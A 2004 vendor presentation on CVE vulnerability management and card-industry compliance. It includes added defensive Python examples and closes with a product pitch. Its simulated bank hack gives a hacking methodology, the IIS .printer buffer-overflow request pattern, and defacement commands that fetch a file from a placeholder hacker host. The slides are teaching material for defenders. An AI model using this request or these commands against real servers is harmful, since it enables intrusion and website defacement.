Proactive Network Security: Do You Speak CVE?

Gary S. Miliefsky, CISSP®, FMDHS
President & CEO, PredatorWatch, Inc.
E-mail: garym@predatorwatch.com

November 23, 2004

PredatorWatch, Inc. is a DoD Contractor

Copyright © 2004 PredatorWatch, Inc.


About Me

Gary S. Miliefsky

20+ Security Veteran
Computer Scientist
CISSP®
DHS is funding CVE® at MITRE (I am a founding member)


Behind the firewall…a gift from a friend?

It Doesn’t Take a Rocket Scientist


Hackers Cause Risk of Non-compliance

Government (Executive Order 13231)
Legal (HIPAA, GLBA, E-SIGN)
Health Care & Pharmaceutical (HIPAA and FDA 21 CFR 11)
Banking and Finance (E-SIGN, GLBA, FDIC Audits)
Higher Education (Due Care and Tort Law)

These markets are being heavily attacked by Hackers on a daily basis.


If You Currently Have…

Anti-Virus Software and a Solid Firewall
Access through Virtual Private Network (VPN)
Internet Service Provider (ISP) Spam Protection
Local Browser/Email/JavaScript Protection
Passwords for Email on Your Network
Encryption Servers (IPSEC, SSL/TLS, HTTPS)
Public Key Infrastructure (PKI) Encryption
Content Proxy (for filtering, Internet acceleration)
Intrusion Detection or Prevention Systems (IDS or IPS)


…Is Your Network Safe?

In short, NO. These “solutions” don’t stop Hackers.
Hackers take advantage of common vulnerabilities and exposures in your network.
Firewalls can be hard to manage, so they may not protect you. And they don’t protect you from internal threats.
Intrusion Detection Systems require human intervention and generate false positives.
Intrusion Prevention Systems may block legitimate access.


Are You Stopping the Hackers?

Anti-virus software can only protect against known viruses; it cannot stop hacker access!
Passwords often don’t stop clever hackers, who use readily downloadable tools that crack them.
Turning off JavaScript doesn’t stop a hacker from running other types of code on your system.
Hackers can break into Virtual Private Networks (VPNs); they aren’t always private!
Firewalls can be points of entry for hackers.


What Damage Can Hackers Cause?

Denial of Service (DoS)
Destruction of Data
Theft of Data
Damage to Your Reputation
Put You at Risk of Legal Liability


Hackers Can Deny You Access

Stop services: vital programs you need to have running
Kill the server: bringing it down, forcing your network, even your company, to a halt
Change the administrator password, locking out your system administrator and letting themselves in to key systems and files


Hackers Can Destroy Data

Crash your system or a node on the network, causing productivity issues and data loss
Send garbage data to the system
Defeat protocols that use date/time of day to gain access to the system
Execute PHP code existing on the system
Execute commands as administrator: erasing data, altering access, creating havoc


Hackers Can Steal Private Data

Enter your network and retrieve system info
Read sensitive files on the system
Get version numbers of installed software and attack using that information
Obtain access to accounts and private data


Serious Network Protection

How Do You Keep out the Hackers?

Analyze Your Network’s Vulnerabilities on a Regular Basis (CVEs)
Regularly Review Those Vulnerabilities (CVEs)
Tune your Firewall against CVE exploits
Harden your Assets by Removing CVEs
Make Sure Your Methods are “Tamper-proof”

Optimized Model Automation of this process is patent-pending by PredatorWatch, Inc.


What is the CVE Standard?

Common Vulnerabilities and Exposures (CVE) is a list or dictionary that provides common names for publicly known information security vulnerabilities and exposures. Using a common name makes it easier to share data across separate databases and tools that until now were not easily integrated. This makes CVE the key to information sharing. If a report from one of your security tools incorporates CVE names, you may then quickly and accurately access fix information in one or more separate CVE-compatible databases to remediate the problem.

CVE is:

One name for one vulnerability or exposure
One standardized description for each vulnerability or exposure
A dictionary rather than a database
How disparate databases and tools can "speak" the same language
The way to interoperability and better security coverage
A basis for evaluation among tools and databases
Accessible for review or download from the Internet
Industry-endorsed via the CVE Editorial Board
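The "common name" idea above is easiest to see in code. The following Python is an added example, not part of the original deck and not PredatorWatch's product: it pulls CVE names out of reports from two differently formatted scanners, normalizes them to the canonical form, and joins them against a fix database keyed by that name, which is exactly the cross-tool lookup the slide describes. The scanner output, the fix text and the identifier CVE-2004-0000 are constructed placeholders; CVE-2001-0241 is the entry this deck discusses later. The normalizer also accepts the historical CAN- candidate prefix and sequence numbers longer than four digits, which the current CVE syntax allows.

```python
import re
from typing import Dict, List, Optional

# Canonical form: "CVE-" + four-digit year + a sequence number of four or more
# digits. Older feeds used the "CAN-" prefix for candidate entries, and the
# current CVE syntax allows sequence numbers longer than four digits.
_CVE_RE = re.compile(r"\b(?:CVE|CAN)-(\d{4})-(\d{4,})\b", re.IGNORECASE)


def normalize_cve_name(text: str) -> Optional[str]:
    """Return the first CVE name in text in canonical upper-case form, or None."""
    match = _CVE_RE.search(text)
    if match is None:
        return None
    year, sequence = match.groups()
    return f"CVE-{year}-{sequence}"


def extract_cve_names(report: str) -> List[str]:
    """All distinct CVE names in a tool report, canonicalized, in order of appearance."""
    names: List[str] = []
    for match in _CVE_RE.finditer(report):
        name = f"CVE-{match.group(1)}-{match.group(2)}"
        if name not in names:
            names.append(name)
    return names


def correlate(reports: List[str], fixes: Dict[str, str]) -> Dict[str, Optional[str]]:
    """Join every CVE name seen in any report to its fix text. None means the
    fix database has no entry, which is itself worth reporting."""
    joined: Dict[str, Optional[str]] = {}
    for report in reports:
        for name in extract_cve_names(report):
            joined[name] = fixes.get(name)
    return joined


# Constructed sample output from two scanners with different formatting.
SCANNER_A_REPORT = """\
host=bank-web-01 port=80 issue=IIS IPP ISAPI overflow ref=CVE-2001-0241 severity=high
host=bank-file-01 port=445 issue=constructed finding ref=cve-2004-0000 severity=high
host=bank-db-01 port=1433 issue=weak sa password ref=none severity=medium
"""

SCANNER_B_REPORT = """\
[bank-web-01] Microsoft IIS 5.0 .printer buffer overflow (CAN-2001-0241)
[bank-web-01] Microsoft IIS 5.0 .printer buffer overflow (CAN-2001-0241)
[bank-file-01] SMB null session allowed (no CVE assigned)
"""

# Constructed fix database keyed by canonical CVE name. CVE-2004-0000 is a
# placeholder identifier, deliberately absent here to show the unmatched case.
FIX_DATABASE: Dict[str, str] = {
    "CVE-2001-0241": "Apply the vendor patch or remove the .printer ISAPI mapping",
}


if __name__ == "__main__":
    for name, fix in correlate([SCANNER_A_REPORT, SCANNER_B_REPORT], FIX_DATABASE).items():
        print(f"{name}: {fix or 'no fix information in database'}")
```

Because both scanners report the same IIS issue under different spellings, the join produces one entry for it rather than two, which is the interoperability the slide is selling; the unmatched placeholder shows why a report should flag CVE names the fix database does not know.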


PredatorWatch is CVE Compatible

Left to right:

Lawrence C. Hale, U.S. Department of Homeland Security, Deputy Director, US-CERT, delivers 3 CVE Mitre Compliance Certificates to PredatorWatch, Inc. at CSI, Nov 8, 2004, Washington, D.C.
Gary S. Miliefsky, CISSP, FMDHS, CEO, PredatorWatch, Inc.
Doug Eames, VP of Sales, PredatorWatch, Inc.


Keep Up to Date on CVEs

Visit http://cve.mitre.org
Keep an eye on the SANS/FBI top 20 CVE list: http://www.sans.org/top20/
Test for the latest CVEs on a daily basis
Report on your CVEs on a daily, weekly or monthly basis (DUE DILIGENCE)
Remove all CVEs that you possibly can (DUE CARE)
Block at the Firewall (INCREASE UPTIME)

E-commerce Real World Scenario:

1. What if you were the CEO, CFO, CIO or CSO of an E-commerce Merchant or a Brick & Mortar Retailer using an Internet Payment Gateway System?
2. What if you had only one CVE in your system?
3. What if anyone could exploit it in 5 minutes?


CVEs in e-Commerce

VISA Announces vulnerability audit requirements (CISP)
Over 21,000 member financial institutions; VisaNet processes over 2,700 transactions/sec during peak season.

MasterCard requires Quarterly CVE Audits beginning 6/2004 (SDP)
7% of all of MasterCard's $921.6 billion annual card purchases take place on the web

Now AMEX (DSS) and Discover (DISC) have launched Audit requirement programs.

Soon, all e-Commerce Merchants must detect/remove critical CVEs to do business online (see page 49 of MasterCard SDP PDF for example)

SOURCE: COMPUTERWORLD, April 14, 2004


What You Should Do To Comply

1. Build Corporate Security Policies that are ISO17799 compliant:
American Express DSS
DiscoverCard DISC
MasterCard SDP
VISA CISP

2. Audit and Report on CVEs
Required by all Credit Card Companies


What Is The ISO 17799 Standard?

10 Sections

Security Policy: to provide management direction & support for information security
Organizational Security: manage information security within the organization
Asset Classification and Control: to maintain appropriate protection of organizational assets
Personnel Security: to reduce the risk of human error, theft, fraud or misuse of facilities
Physical & Environmental Security: to prevent unauthorized access, damage and interference to business premises and information
Communications and Operations Management: to ensure the correct and secure operations of information processing facilities
Access Control: control access to information
System Development and Maintenance: to ensure security is built into information systems
Business Continuity Management: to counteract interruptions to business activities and to protect critical business processes from the effects of major failures or disasters
Compliance: to avoid breaches of any criminal and civil law, statutory, regulatory or contractual

Online Banking Real World Scenario:

1. What if you were the CEO, CFO, CIO or CSO of Fidelity Trust Bank with $1B under management?
2. What if you had only one CVE in your system?
3. What if anyone could exploit it in 5 minutes?


Welcome to FidelityTrustBank.com

FidelityTrustBank.com has CVEs


Objectives: Find and Remove CVEs

“The most important step towards securing your network is to shrink the window of vulnerability as close to zero as possible. No vulnerabilities means no place to hack.”

If you don’t, Hackers will take advantage of you.


Hacking an Online Bank

The Break In

The break-in (excerpt from CNET News.com: http://news.com.com/2009-1017-893228.html):

“One strategy is to attack the hardware itself, exploiting notoriously glitch-prone Web systems to gain access to the servers running the bank's online operations.

"Most banks run Unix Web servers or Microsoft IIS (Internet Information Server), and both are prone to remote attacks that can allow a hacker to take control of the server itself," said David Ahmad, the moderator of the Bugtraq mailing list, one of the leading e-mail lists dedicated to reports of software vulnerabilities.

Companies including financial institutions subscribe to the list. In April, Microsoft issued a security patch to plug 10 new holes that could allow hackers to take full control of computers running the company's IIS program.”

Do NOT try this at home. It’s Illegal.


The Break In (continued)

“In seizing control of a server, security experts say, a hacker can also modify any trusted applications to perform malicious operations. An attack that manipulates such internal applications is more likely to escape notice by the network's electronic guards.

"Intrusion-detection systems only spot known attacks or behaviors that indicate a certain class of attack," Ahmad said. "Attacks against a server might be detected, but a complex application-based attack might look like normal behavior."

Financial institutions do make it difficult for employees to move money, but their systems must be flexible enough to work with customers who are not subject to the same level of scrutiny. This could allow an insider to create a fake customer transaction and authorization to shepherd the money right out of a system.”

CNET News.com


Hacking Methodology

Exploit CVEs

Footprint
Scan
Enumerate
Penetrate
Escalate
Pillage
Get Interactive
Expand influence
Cleanup (Denial of Service)

In this presentation, I will assume that the first two steps have been done by PredatorWatch.

Focus of this presentation, with only one specific example: deface website and steal database from simulated Bank.


Common IIS 5 Attacks Against CVEs

Here are the most dangerous IIS 5 attacks currently:

Buffer overflows
File System Traversal
Script source revelation

Hackers take advantage of this flaw in the online Bank


Buffer Overflow CVE in IIS v5.0

CVE-2001-0241

CVE Version: 20040901

This is an entry on the CVE list, which standardizes names for security problems. It was reviewed and accepted by the CVE Editorial Board before it was added to CVE.

Name: CVE-2001-0241

Description: Buffer overflow in Internet Printing ISAPI extension in Windows 2000 allows remote attackers to gain root privileges via a long print request that is passed to the extension through IIS 5.0.


CVE In Detail: IIS Buffer Overflow: IPP

Internet Printing Protocol (IPP) functionality is implemented in IIS 5 via an ISAPI filter (C:\WINNT\System32\msw3prt.dll)
This functionality is enabled by default
Malformed requests for .printer files invoke this ISAPI and cause a buffer overflow, resulting in remote SYSTEM privileges


CVE Exploit: IIS Buffer Overflows: IPP

Simple to exploit:

GET /null.printer HTTP/1.0
Host: [> 420 char. buffer]
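The request pattern on this slide is also what a defender should look for in web server logs or at an inline filter. The following Python is an added example, not from the deck and not PredatorWatch's code: it parses raw HTTP/1.x requests, lists every request for a .printer resource (on a server that does not use IPP, each one is unexpected traffic), and separately flags .printer requests carrying a header longer than the 420-character figure from the slide. The sample requests are constructed test input; the threshold constant and function names are this example's own.

```python
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Threshold taken from the slide's "> 420 char. buffer" figure; tune to your environment.
OVERSIZED_HEADER_LIMIT = 420


@dataclass(frozen=True)
class Finding:
    request_line: str
    header_name: str
    header_length: int


def parse_request(raw: str) -> Tuple[str, Dict[str, str]]:
    """Split a raw HTTP/1.x request into its request line and lower-cased header map."""
    lines = raw.replace("\r\n", "\n").split("\n")
    request_line = lines[0].strip()
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if not line.strip():
            break  # the blank line terminates the header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return request_line, headers


def is_printer_request(request_line: str) -> bool:
    """True when the request path maps to the .printer ISAPI extension (msw3prt.dll)."""
    parts = request_line.split()
    if len(parts) < 2:
        return False
    path = parts[1].split("?", 1)[0]
    return path.lower().endswith(".printer")


def printer_requests(requests: List[str]) -> List[str]:
    """Every .printer request line, regardless of size, for review."""
    lines = [parse_request(raw)[0] for raw in requests]
    return [line for line in lines if is_printer_request(line)]


def oversized_printer_headers(requests: List[str],
                              limit: int = OVERSIZED_HEADER_LIMIT) -> List[Finding]:
    """.printer requests carrying any header value longer than limit."""
    findings: List[Finding] = []
    for raw in requests:
        request_line, headers = parse_request(raw)
        if not is_printer_request(request_line):
            continue
        for name, value in headers.items():
            if len(value) > limit:
                findings.append(Finding(request_line, name, len(value)))
    return findings


# Constructed sample traffic: an ordinary page request, a .printer request
# with a short Host header, and one whose Host header is well over the limit.
SAMPLE_REQUESTS = [
    "GET /index.html HTTP/1.0\r\nHost: www.bank.example\r\n\r\n",
    "GET /status.printer HTTP/1.1\r\nHost: intranet.bank.example\r\n\r\n",
    "GET /null.printer HTTP/1.0\r\nHost: " + "A" * 500 + "\r\n\r\n",
]


if __name__ == "__main__":
    for line in printer_requests(SAMPLE_REQUESTS):
        print("printer request:", line)
    for f in oversized_printer_headers(SAMPLE_REQUESTS):
        print(f"oversized header: {f.header_name} ({f.header_length} bytes) in {f.request_line!r}")
```

The two-tier output matters: the size check catches the overflow attempt the slide shows, while the plain list of .printer hits tells you whether the feature is being touched at all, which decides whether the cleanup step later in the deck (unmapping the extension) can be applied without breaking anything.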


Deface Online Bank (Simulation)

Before / After

C:\> ftp [hacker-ip]
C:\> get hack-index.html
C:\> rename index.html


IIS5 Attack Countermeasures

1. IIS5 Checklist (microsoft.com/security)
2. Visit http://www.windowsupdate.com on a regular basis
3. Install all necessary security and system patches as required

Repeat Steps 1-3 Religiously!


Recommends…

THIS ONE IS CRITICAL

Get Computer Updates… …Means CVE Management

Every day there is a new CVE (Common Vulnerability and Exposure); see http://cve.mitre.org

This website is the homepage for helping you stop hackers and harden your assets. Why?

By knowing the CVEs, if you find a system with a CVE, then you can find a way to block an exploit that would impact this asset.


Protect Against CVE Exploiters

Detect and Track Assets
Policy: what to do if offline, I/O, VPN, etc.
Process: equip I/O, Laptops, etc.

Audit your Network for CVEs:
Careful with free tools; you may DoS yourself!

Lock The Doors against CVE Exploits
Manage your firewall, daily.

Cleanup your CVEs


Protect Against CVE Exploiters

Detect and Track Assets

Laptops in and out of the office
Personal computer or Company asset?
Firewall, Antivirus, Antispyware, Patches up to date?
Inbound scan for CVEs; high risk? Then quarantine.

Wireless Routers/LANs
How many in the building? Encrypted? Authenticated?

Servers and other equipment
Something new on the LAN? Who owns it?
Something offline repeatedly? Why?


Protect Against CVE Exploiters

Audit your Network for CVEs:

Find a tool you like…
Google “Laptop Auditor” or “Security Auditor”
Do an eval of Open Source vs Turnkey
If you built your Firewall from scratch, go for Open Source; else, find a Company you can work with and trust.
Pick a tool that doesn’t take any assets offline
Scans and reports on CVEs


Protect Against CVE Exploiters

Lock The Doors against CVE Exploits

Review logs; look for suspicious traffic
Make sure you set up the VPN interface properly and know who’s using it and if they are coming in through a secure tunnel on an insecure or ‘sick’ computer
Block ports for all inbound/outbound that you don’t use
445 was exploited by MSBlast and Sasser. Do you need it open?
Look at the computers that have CVEs: how long to fix and what port is it on? Update your rules table until it is fixed.
Don’t trust all patches. Reinspect for same or new CVEs
Keep repeating this process, daily.
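The "update your rules table until it is fixed" step, written out as an added Python example (not the deck's own code and not PredatorWatch's FirewallBooster™): a rule table that takes the findings of each CVE scan, blocks the affected host and port while the CVE is open, and lifts the block only when a later scan no longer reports it. Driving the table from the rescan rather than from patch status is how the "don't trust all patches, reinspect" advice above is enforced. Hosts, ports, the two days of scan results and the identifier CVE-2004-0000 are constructed; CVE-2001-0241 is the IIS entry discussed earlier.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Set, Tuple


@dataclass(frozen=True)
class CveFinding:
    host: str
    port: int
    cve: str


@dataclass
class RuleTable:
    """Temporary inbound blocks on (host, port), each remembered with the CVE
    names that justify it. A block is lifted only when a fresh scan reports no
    CVE for that host and port, never merely because a patch was applied."""
    rules: Dict[Tuple[str, int], Set[str]] = field(default_factory=dict)

    def apply_scan(self, findings: List[CveFinding]) -> List[str]:
        """Reconcile the table with the latest scan and return the change log."""
        wanted: Dict[Tuple[str, int], Set[str]] = {}
        for f in findings:
            wanted.setdefault((f.host, f.port), set()).add(f.cve)

        log: List[str] = []
        for key, cves in wanted.items():
            if key not in self.rules:
                log.append(f"BLOCK inbound tcp {key[0]}:{key[1]} ({', '.join(sorted(cves))})")
            self.rules[key] = cves  # keep the CVE list current for reporting
        for key in list(self.rules):
            if key not in wanted:
                log.append(f"UNBLOCK inbound tcp {key[0]}:{key[1]} (rescan clean)")
                del self.rules[key]
        return log

    def is_blocked(self, host: str, port: int) -> bool:
        return (host, port) in self.rules


# Constructed scan results for two consecutive days. CVE-2004-0000 is a
# placeholder identifier, not a real entry.
DAY1_SCAN = [
    CveFinding("bank-web-01", 80, "CVE-2001-0241"),
    CveFinding("bank-file-01", 445, "CVE-2004-0000"),
]
# Day 2: the web server was patched and rescanned clean; the file server was
# "patched" too, but the rescan still reports the CVE, so its block stays.
DAY2_SCAN = [
    CveFinding("bank-file-01", 445, "CVE-2004-0000"),
]


def run_two_days() -> Tuple[RuleTable, List[str], List[str]]:
    """Apply both constructed scans in order and return the table and both change logs."""
    table = RuleTable()
    day1_log = table.apply_scan(DAY1_SCAN)
    day2_log = table.apply_scan(DAY2_SCAN)
    return table, day1_log, day2_log


if __name__ == "__main__":
    table, day1_log, day2_log = run_two_days()
    print("\n".join(day1_log + day2_log))
```

The change log is what an auditor wants for the "due diligence" reporting on the earlier slide: each block records the CVE names that justified it and each unblock records that a rescan came back clean. In practice the port-level block is a stopgap scoped to untrusted source networks, so that a finding on a public web port buys time for the maintenance window without taking the service off the air for everyone.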


Protect Against CVE Exploiters

Cleanup your CVEs

Remember the IIS 5.0 vulnerability?
Did the patch fix it? Yes, good. No? Then, why not shut off the web-based print server feature of the IIS server: one quick configuration change and no CVE to exploit.
Some CVEs can be patched
Others require intelligent reconfiguration
Security by Obscurity (usually a no-no) may actually delay a successful attack against a CVE until you have a chance to shut down the service, update the firewall rules table or fix the CVE.


AN INDUSTRY FIRST - CLIENTLESS QUARANTINE SYSTEM

Auditor™ is the world’s first clientless quarantine system that drives firewalls to do a better job, while at the same time, enables IT Managers, Network Security Consultants and Managed Security Service Providers (MSSPs) to harden networks and show best practices for regulatory compliance.

Introducing PredatorWatch Auditor™…


PredatorWatch Auditor™ Automates…

Detection and Tracking of Assets
Auditing your Network for CVEs
Locking The Doors against CVE Exploits
Cleanup your CVEs


Auditor™ Features

World’s Fastest CVE® Vulnerability Assessment Engine
Secure Vulnerability Update Server
Dynamic Rogue Wireless and Laptop Detector
Immediate Audits and On Demand Audits
Patent-pending FirewallBooster™ for major firewalls
PatchBooster™ for Microsoft® SUS
Asset Tracker with built-in MAC/IP Tracker™
Security Policy Builder with ISO®17799 Templates
Patent-pending Regulatory Compliance Reporter


Auditor™ Benefits

Automatically detects, audits, quarantines and remediates against all your computers, servers, desktops, laptops, network equipment and wireless routers by tight integration with the firewall.

Protects your network behind the firewall from common vulnerabilities and exposures, through frequent, rapid and automated vulnerability assessment, patch management and remediation.

Extends the timetable to remediate, by automatically reconfiguring the firewall at port and IP level, allowing organizations to patch during normally scheduled maintenance windows, rather than during inconvenient and costly intervals.

Helps enforce policy and ensure regulatory compliance by constantly auditing corporate security standard configurations to reduce risk.


What Analysts Are Saying…

Finally, a turnkey security solution that really works for the SME marketplace.
- Jon Oltsik, Senior Analyst

The laptop and wireless detection and quarantine feature is unique.
- Chris Shipley, Executive Producer, DemoMobile

It’s a streamlined vulnerability management solution with features of a CIO in a box.
- Charles Kolodgy, Research Director, Security Products

The missing link in network security, behind the firewall, for the small to medium size enterprise.
- James Hurley, Vice President, Security & Privacy Research

A powerful security solution that is simple to use, easy to deploy and requires little to no training.
- Phebe Waterfield, Security Analyst


…And Partners

... a phenomenal technology/solution. Simply amazing!
- David Trudeau, Director of Sales

Auditor™ turns an IBM xSeries into a powerful security appliance.
- Jim Stallings, Senior Vice President


…And Customers

Banking/GLBA
“Inside our firewall, our Auditor™ security appliance detects and diagnoses potential security flaws that could cause our bank to be at risk of FDIC IT Security Audit and GLBA noncompliance…We are very pleased with the Auditor™.”
- Steve Irish, CIO, Enterprise Bank & Trust Co.

Education/E-Sign
“...it is quite common for faculty/staff/students to plug into computer system without my knowledge... Auditor™ gives me the ability to get a quick inventory of which systems are new to the network and automatically quarantine those that are at risk.”
- Kenneth Kleiner, Systems & Network Manager, UMASS Lowell

Insurance/HIPAA
“With Auditor™ on our network, we get regular validation that we are protected against attack and enjoy a significant increase in security.”
- William Tyson, SVP, AGIA


We Are The Technology Leader…

1. The only Vulnerability Management player to develop the patent-pending Firewall Booster™ technology to tie and unify Firewall and Vulnerability Management together.
2. The first to dynamically detect rogue and high risk assets (mobile & wireless) and intelligently quarantine at the Firewall.
3. The only Vulnerability Management player to expand into Enterprise Security Management with asset management, policy building, patch boosting and regulatory compliance reporting.
4. The first and only to fit on a Compact Flash, a 1U and the IBM BladeCenter.

PredatorWatch, Inc.


Questions?